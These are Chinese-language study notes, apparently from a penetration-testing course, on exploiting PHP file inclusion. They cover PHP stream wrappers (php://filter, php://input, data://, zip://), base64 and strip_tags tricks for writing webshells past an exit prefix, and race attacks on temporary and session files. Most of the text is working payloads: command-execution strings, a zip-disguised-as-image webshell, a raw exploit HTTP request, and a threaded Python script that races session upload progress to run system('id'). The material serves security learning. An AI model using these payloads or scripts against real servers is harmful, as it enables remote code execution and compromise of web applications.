渗透测试前四天PHP文件包含笔记
一、基础概念
1.1 漏洞原理
PHP文件包含漏洞发生在使用文件包含函数时,用户可控的参数未经过严格过滤,导致可以包含任意文件。常见包含函数:
include()require()
关键区别:
include()失败时产生警告,脚本继续执行require()失败时产生致命错误,脚本终止
1.2 环境要求
allow_url_fopen = On (允许打开远程文件,默认开启)
allow_url_include = On (允许包含远程文件,PHP 5.2后默认关闭)二、PHP伪协议利用
2.1 php://filter - 读取文件源码
作用 :读取文件并进行编码转换,避免直接执行
适用条件 :不受allow_url_fopen和allow_url_include限制
基本用法:
php://filter/read=convert.base64-encode/resource=文件路径读取当前目录文件:
?file=php://filter/read=convert.base64-encode/resource=flag.php读取上级目录文件(使用多层符号链接):
?file=php://filter/read=convert.base64-encode/resource=proc/self/root/proc/self/root/var/www/html/flag.php2.2 php://input - 执行PHP代码
作用 :读取POST原始数据作为PHP代码执行
条件 :需要allow_url_include = On
示例:
POST /lfi.php?file=php://input
[POST DATA] <?php system('whoami'); ?>2.3 data:// - 数据流协议
条件 :双on(allow_url_fopen和allow_url_include都需开启)
用法:
?file=data://text/plain,<?php phpinfo(); ?>
?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=2.4 zip:// - 压缩包包含
特点:
- 不受
allow_url_*限制 - 需要绝对路径
- zip:// 需要定格才可以使用
利用步骤:
- 创建包含恶意代码的文件:
shell.txt - 压缩为ZIP:
zip shell.zip shell.txt - 上传并重命名为图片:
mv shell.zip shell.jpg - 包含利用:
?file=zip:///var/www/html/uploads/shell.jpg%23shell.txt
2.5 compress.zlib:// - 临时文件利用
特殊用途 :在LFI中创建临时文件
原理 :使用compress.zlib://http://会在本地创建临时文件存储下载内容
三、绕过技巧
3.1 Base64解码绕过
场景 :写入文件时被添加<?php exit; ?>前缀
原理 :PHP Base64解码会跳过非法字符(<, ?, ;, >, 空格等)
利用方法:
php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);
// 利用方式:filename=php://filter/write=convert.base64-decode/resource=shell.php
// POST txt=aaPD89YCRfR0VUWzBdYDs/Pg== ("phpexita" + shell_base64)关键:让"phpexita"成为8字节合法Base64字符串被解码,后续内容也被解码
3.2 strip_tags绕过
原理 :strip_tags可去除XML标签
利用链:
php://filter/read=string.strip_tags|convert.base64-decode/resource=uploaded_file四、临时文件竞争利用
4.1 phpinfo()辅助LFI
条件:存在phpinfo页面
原理:
- PHP上传文件会先保存到临时文件(/tmp/phpXXXXXX)
- phpinfo会泄露临时文件名
- 在文件删除前竞争包含
Python利用脚本:
python
import threading, requests
target = 'http://192.168.1.100/'
sessid = 'test'
def upload(e):
while not e.is_set():
files = {'file': ('a.txt', b'a'*4096)}
data = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("id"); ?>'}
requests.post(target, files=files, data=data, cookies={'PHPSESSID': sessid})
def include(e):
while not e.is_set():
resp = requests.get(f'{target}?file=/tmp/sess_{sessid}')
if 'uid=' in resp.text:
print("Success!")
e.set()
# 多线程提高成功率
event = threading.Event()
t1 = threading.Thread(target=upload, args=(event,))
t2 = threading.Thread(target=include, args=(event,))
t1.start(); t2.start()4.2 Session.upload_progress(无需phpinfo)
PHP配置:
session.upload_progress.enabled = On (默认开启)
session.upload_progress.cleanup = On (默认开启,会清理Session)利用条件:开启Session机制
数据包构造:
http
POST /upload.php HTTP/1.1
Cookie: PHPSESSID=attack_sess
------WebKitFormBoundary
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"
<?php system('id'); ?>
------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
[大文件内容]包含路径 :/tmp/sess_attack_sess 或 /var/lib/php/sessions/sess_attack_sess
4.3 PHP 7 残留文件
原理:利用PHP 7.0-7.1.19的崩溃漏洞使临时文件不被删除
崩溃Payload:
?file=php://filter/string.strip_tags/resource=/etc/passwd利用流程:
- 发送崩溃请求
- 同时上传文件(临时文件残留)
- 爆破临时文件名(/tmp/php6随机字符)